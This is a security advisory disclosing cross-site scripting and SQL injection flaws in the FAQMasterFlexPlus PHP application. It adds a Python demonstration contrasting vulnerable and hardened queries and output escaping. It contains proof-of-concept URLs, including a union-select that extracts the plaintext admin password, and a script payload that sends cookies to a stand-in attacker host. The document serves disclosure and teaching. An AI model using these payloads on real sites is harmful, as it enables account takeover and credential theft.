- Security Advisory -
- FAQMasterFlexPlus multiple vulnerabilities -
---------------------------------------------------------------
Product: FAQMasterFlexPlus
Version: Latest version is affected, other not tested
Vendor: http://www.netbizcity.com
Affected by: Cross-Site Scripting & SQL injection
I. Introduction.
FAQMasterFlexPlus is a free, database-driven web application written in PHP
for creating and maintaining Frequently Asked Questions (FAQs) on a web site.
It has language support and, according to the documentation, its features
are: "Allow to create unlimited categories and unlimited Questions/Answers
and has web-based category and FAQ administration with Add, Edit, Delete
Capability."
It is free software released under the GNU General Public License (GPL).
It runs on PHP and MySQL and comes bundled with some versions of Fantastico
(cPanel X).
II. Description
Multiple flaws have been discovered in FAQMasterFlexPlus:
1) Cross-Site Scripting:
The script faq.php is vulnerable to XSS: the variable $cat_name is not
properly sanitized before being reflected into the page, so an attacker can
inject script that runs in the victim's browser, for example to steal the
targeted user's cookies.
The admin scripts that add/edit/delete categories and add/edit/delete FAQs
also fail to sanitize user-supplied input.
PoC:
http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS]
2) SQL Injection (exploiting this issue requires magic_quotes_gpc set to Off
in php.ini; note that magic_quotes_gpc only backslash-escapes quotes in
request data and is not a real fix, and it was removed from PHP in 5.4).
All scripts are vulnerable to SQL injection in their database queries, because
request parameters are placed directly into the query text.
PoC:
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*
The page then shows an extra FAQ entry whose question text is the value of the
injected column, for example:
Q faquser@localhost
Proof of Concept to retrieve the admin password:
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin
Q supersecretpassword
bingo! ;)
In addition, passwords are stored in plaintext, which is a serious security
flaw in itself: a single injection discloses working admin credentials.
This software contains many bugs and should be fully audited before it is
relied on.
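The following is an added example, not code from FAQMasterFlexPlus or from the advisory author. It models in Python, against an in-memory SQLite database, the two issues described above: the query built by pasting category_id into a quoted literal (which the union-select PoC breaks out of) next to a parameterised query, and the page that reflects cat_name unescaped next to one that HTML-escapes it. The schema is constructed: the advisory only reveals the table `users` and the columns `userid` and `passwrd`; the `faq` table, its column names, the exact shape of the original query and the `attacker.example` host are assumptions. The user() PoC is MySQL-specific and is not reproduced here, and magic_quotes_gpc-style backslash escaping is not modelled because SQLite does not treat backslash as an escape.

```python
import html
import sqlite3

# Constructed stand-in for the application's database. Only `users`, `userid`
# and `passwrd` come from the advisory; everything else is assumed.
SCHEMA = """
CREATE TABLE users (userid TEXT, passwrd TEXT);
CREATE TABLE faq (faq_id INTEGER, category_id INTEGER, question TEXT, answer TEXT);
INSERT INTO users VALUES ('admin', 'supersecretpassword');
INSERT INTO faq VALUES (1, 1, 'How do I reset my password?', 'Use the reset link.');
INSERT INTO faq VALUES (2, 2, 'Question in another category', 'n/a');
"""

# Payloads from the advisory, URL-decoded. The trailing quote of the original
# query closes the 'admin literal, which is why the payload has no closing quote.
XSS_PAYLOAD = ("<script>document.location="
               "'http://attacker.example/?c='+document.cookie</script>")
SQLI_PAYLOAD = "1' union select 1,1,passwrd,1 from users where userid='admin"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def faq_rows_vulnerable(conn, category_id):
    # Assumed shape of the vulnerable query: the request value is pasted into
    # a quoted literal, so a single quote in category_id ends the literal and
    # the rest of the value becomes SQL.
    sql = ("SELECT faq_id, category_id, question, answer FROM faq "
           "WHERE category_id='%s'" % category_id)
    return conn.execute(sql).fetchall()


def faq_rows_safe(conn, category_id):
    # Hardened form: a bound parameter never becomes part of the SQL text, so
    # the injection string is compared as a whole and matches nothing.
    sql = ("SELECT faq_id, category_id, question, answer FROM faq "
           "WHERE category_id=?")
    return conn.execute(sql, (category_id,)).fetchall()


def render_vulnerable(cat_name, rows):
    # cat_name and the third selected column are written into the HTML as-is.
    # With the union payload the third column is whatever the attacker selected.
    lines = ["<h2>%s</h2>" % cat_name]
    lines += ["<p>Q %s</p>" % row[2] for row in rows]
    return "\n".join(lines)


def render_safe(cat_name, rows):
    # Hardened form: escape at the point of output so markup in the data is
    # shown as text, not executed.
    lines = ["<h2>%s</h2>" % html.escape(cat_name, quote=True)]
    lines += ["<p>Q %s</p>" % html.escape(row[2], quote=True) for row in rows]
    return "\n".join(lines)


def leaked_passwords(conn, payload=SQLI_PAYLOAD):
    """Return the question texts the vulnerable query yields that are not FAQ
    questions at all, i.e. values pulled in from the injected SELECT."""
    real = {row[2] for row in faq_rows_safe(conn, "1")}
    return [row[2] for row in faq_rows_vulnerable(conn, payload)
            if row[2] not in real]


if __name__ == "__main__":
    db = connect()
    print("vulnerable:", render_vulnerable(XSS_PAYLOAD,
                                           faq_rows_vulnerable(db, SQLI_PAYLOAD)))
    print("safe:      ", render_safe(XSS_PAYLOAD, faq_rows_safe(db, SQLI_PAYLOAD)))
```

Run stand-alone, the vulnerable rendering contains the raw script tag and a "Q supersecretpassword" line, matching the advisory's output; the safe rendering shows the escaped payload and no FAQ rows, because the bound parameter does not match any category.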
III. Timeline
08/05/2007 - Bugs discovered
10/05/2007 - Vendor Contact (No Response)
12/12/2007 - Vendor Contacted Again (No Response)
28/12/2007 - Advisory Disclosure
IV. Credits
Juan Galiana <jgaliana gmail com>
Regards